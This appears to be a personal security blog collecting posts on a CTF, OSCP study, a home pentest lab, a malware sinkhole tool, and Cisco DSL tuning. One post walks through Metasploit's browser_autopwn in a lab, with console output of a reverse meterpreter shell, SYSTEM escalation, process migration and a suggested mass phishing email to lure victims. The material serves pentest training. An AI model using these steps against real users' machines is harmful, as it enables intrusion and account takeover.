Australian security conference RUXCON took place in Melbourne over the weekend. The con was good, the drive down took about 6-7 hours which was wasn’t so bad. Friday night involved a lot of drinking, while Saturday night was drinking and the CTF (see below).

Unfortunately I saw no talks this year since I spent most of the time participating in the CTF (capture the flag) contest as part of a two man team called ‘White & Nerdy’, giving us 2nd place in the end. Not a bad position for our first CTF competition. I’ll probably fly on over to Kiwicon next year to participate in their CTF competition as I talked to a couple of people who had nothing to say but good things about it at ruxcon.

The CTF had a few levels (network, web app, unix, reversing) which resulted in a token upon completion of the level. The UNIX levels were the most fun as people kept dropping the databases or generally just breaking the web app levels making it almost impossible to compete and i’m not sure if I even saw the network levels running.

Additionally the unix levels will be available up at http://www.exploit-exercises.com soon!

2 months ago or so I decided to take Offensive Security’s ‘Penetration Testing with Backtrack’ course with some friends from work. The course itself is good and a lot of study on topics covered in the lab materials is expected. The offsec guys give you a good starting point, but you will need to research quite a lot on your own which the lab guide does not really help with. Be prepared to buy a few other books, spend a lot of time reading wikipedia & so forth. Be prepared to put in 5-6 hours a night and spend most of your weekends glued to a computer.

I bought the 60 day pack of the lab time, however was done with the labs within 30 days. I spent the next 30 days taking my time in writing the report, making sure everything was up to par incase I was borderline on the exam. Having the remaining few days allowed me to go back into the labs and get any required screenshots that were missing.

Once my time was up, I booked the exam for a week after my lab time ended, then began to prepare, prepare, prepare. I probably over-prepared one would say. Once the exam started everything pretty much fell into place, to the point where I had achieved the pass mark 2 hours into the exam. There are multiple hosts in the exam network, most of which you will have never seen before. Doing some of the extra credit work from the course will give you a good understanding of what you need for the exam.

I made good use of my metasploit skills during the labs, however there are limits to what you can actually use metasploit for in the exam. when the time comes for your exam to start, you will receive an outline for the exam which also covers metasploit usage. Most of the metasploit usage for myself came around the note taking side of the tool, keeping track of what hosts I had completed, using the credentials stored in the db, etc. Also the auxiliary modules make enumeration that much easier, I don’t know why anyone uses anything else.

Over the next few months I plan on completing the Offensive Security Penetration Testing With Backtrack’ course in my spare time. They give you access to labs via VPN, but I figure it can’t hurt if I have a lab setup as a fall back or for when my lab time runs out. Over the last few days i’ve spent some time setting up a lab. What I used was a PC that met the below specs;

- Intel Q6600 CPU
- 8GB RAM
- 1TB HDD
- VMWare ESXi

Once that was all complete I setup VMs for the following:

- Metasploitable
- pWnOS
- UltimateLAMP
- Windows 2000 Server SP4
- Windows 2008 Server Enterprise R2 x64
- Windows 2008 Server Enterprise R2 x64 SP1
- Windows 2003 Server Enterprise
- Windows 2003 Server Enterprise SP1
- Windows 2003 Server Enterprise SP2 (with MSSQL 2008)
- Windows XP Pro
- Windows XP Pro SP1
- Windows XP Pro SP2
- Windows XP Pro SP3

Metasploitable is the Ubuntu image released by Metasploit/Rapid7. It runs a few services (apache, distcc, mysql, ssh, etc) some of which are exploitable, others which aren’t. The plan will be to install vulnerable versions of proftp and samba.

UltimateLAMP runs older and vulnerable versions of a few different applications, some of which are; drupal, joomla, phpmyadmin, sugarcrm, zencard & oscommerce.

This gives me a fairly broad range where I should be able to cover most things that pop up. Additionally i’ll have to install other popular enterprise apps (Sharepoint, Lotus?) to try and cover everything off. Of course on the attack side i’ll have a VM setup to use backtrack5 since that’s what they recommend for the PWB labs/training

For the past few years I have been interested in incident response & IDS. One thing I came to think was ‘how can i make this easier?’. Eventually this brought me to what many people have come to know as ‘DarkNET’s. A darknet is a range of public IP address space which has NO live hosts. As there are no live hosts all of the traffic should be illegitimate, scanning, worms etc. Unfortunately they aren’t useful for anything other than gathering statistics, or building pie charts etc.

This brings me to what I am now calling ‘MalNET’. To help track malware which is attempting to download via HTTP I came up with a (very) work in progress program written in python. MalNET serves as a low interaction HTTP server which responds with a ’200 OK’ for every request. When a malware attempts to retrieve http://bad.malwaredomain.com/som/bad/file.exe, MalNET basically says ‘yep, OK, here it is’ and then does nothing. To make this work you will need to run some sort of blackhole DNS setup in your environment such as the one on offer from malwaredomains.com. Once you have traffic redirected to your MalNET host, you should be able to see what the malware is trying to download.

You can check out what i’ve made so far over @ my new GitHub repository with the command:

git clone git://github.com/brainiac3/malnet.git

After talking with a few people who have done the SANS: SEC560 (GPEN) course and challenging the exam myself, one thing I felt that was missing regarding metasploit was the browser exploitation features. With pentesting and exploitation in general focusing on client-side attacks now for a while I thought the course could probably benefit from something like this for pentesting. First you’ll need to start up metasploit and load the server/browser_autopwn module:

       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 209 payloads - 23 encoders - 8 nops
       =[ svn r9403 updated 3 days ago (2010.06.03)

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

From here, the only option we need to change in order to get some basic functionality working is the LHOST option. Ofcourse, unless you want to type out the long+random URIPATH string, you might want to change that also. Once those options are set, we can also run the exploit:

msf auxiliary(browser_autopwn) > set URIPATH testing
URIPATH => testing
msf auxiliary(browser_autopwn) > set LHOST 192.168.0.22
LHOST => 192.168.0.22
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.0.22...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/90Yiozy7u9n
[*]  Local IP: http://192.168.0.22:8080/90Yiozy7u9n
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/xGIjmqty
[*]  Local IP: http://192.168.0.22:8080/xGIjmqty
[*] Server started.

<- cut ->

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.22:3333
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.22:6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:8080/testing
[*]  Local IP: http://192.168.0.22:8080/testing
[*] Server started.

Now on our client we browse to the URL listed above as the ‘Local IP’. In this case it would be http://192.168.0.22:8080/testing. Once that is done, you can check the metasploit console window and you will see:

[*] Request '/testing' from 192.168.0.5:64865
[*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865
[*] JavaScript Report: Windows:Vista:undefined:en-us:x86:MSIE:7.0:
[*] Responding with exploits
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.0.5:64866...
[*] Sending stage (748032 bytes) to 192.168.0.5
[*] Meterpreter session 1 opened (192.168.0.22:3333 -> 192.168.0.5:64867) at Sun Jun 06 12:25:01 +1000 2010

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type         Information                   Connection
  --  ----         -----------                   ----------
  1   meterpreter  vistavm\testadmin @ VISTAVM  192.168.0.22:3333 -> 192.168.0.5:64867

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > use priv
Loading extension priv...success.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > idletime
User has been idle for: 2 mins 46 secs
meterpreter >

Now, how would you go about getting clients/victims to visit this in a pentest? Doing an organisation wide mass email is probably the easiest way. Also if you start the msfconsole session as root you can change the server destination port to port 80 provided nothing else is listening on that port.

You will also likely want to migrate to a more stable process within meterpreter incase the user closes down their browser. Under meterpreter check for stable running processes (for example, winlogon or lsass) and run ‘migrate ‘ so your session stays connected.

The goal for the next year is to pass the GIAC GSE (GIAC Security Expert) by probably visiting Vegas (again!) next year. The GSE has a few pre-requisites in the form of GCIH, GCIA, GSE and 2 ‘electives’ (other GIAC exams). Since I passed the GPEN exam which will be an elective, I need to focus on getting the 3 cores done which will probably be GCIH first, then tackle GSEC and GCIA.

As all this is self funded i’ll likely just be reading books on the various topics rather than the actual GIAC material, but we’ll see how that pans out.

Thinking of doing a specific Cisco certification (CC[NA|NP|IP|IE])? Then you might be interested in the Community Lab provided by Packet Life.

The ‘Community Lab’ is is divided up into 2 blocks with the same equipment. You are able to book one block of equipment or both for free of charge. Bookings seem to be booked well up into March currently, so it might be a while before you can get access.

Donations are encouraged, but not required in order to get access. Definitely an option if you can’t afford the lab prices offered by the various vendors to get some lab time.

I recently changed ISPs to a cheaper plan (not by much) which provides more quota (about 40gb) per month than what I was getting from my previous provider. Along with this, I went to the 8Mb DSL plan where as previously I was on the 1.5Mb. When you start getting higher speeds, alot of other factors come into how stable your connection is.  Before I made any changes, my atm0/0/0 interface was looking like:

Speed (kbps): 7300
Noise Margin: 6.0 dB

A noise margin of 6.0 dB turns out to be the bare minimum you would want to have as it’s the borderline for a stable connection and the connection from hell. As I have been having connection issues lately, I decided to do some googling. On a few sites I came across some undocumented cisco commands, one of which was “service internal”. Normally on an ATM interface you will see something like:

adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
lom Loss Of Margin watch counter for line retrain
operating-mode auto or specific ADSL mode

After going into config mode:
adsl-gw(config)#service internal
adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
gain-setting ADSL programmable gain setting
lom Loss Of Margin watch counter for line retrain
max-tone-bits set maximum bits per tone limit
noise-margin set noise margin offset
operating-mode auto or specific ADSL mode
power-cutback Noise Threshold for Power CutBack

Voila. The setting I wanted to play with was the noise-margin. After setting the noise margin with “dsl noise-margin 2″ (settings between -3 and 3 accepted, the higher (3) the better) my DSL stats now say:

Noise Margin: 7.5 dB
Speed (kbps): 6592

The noise-margin seems to go between 7.5 and 9 which is optimal. The other setting I can try is increasing the noise-margin to 3, however I will sync at around 6200 once that’s done.

More undocumented Cisco commands here, here and here.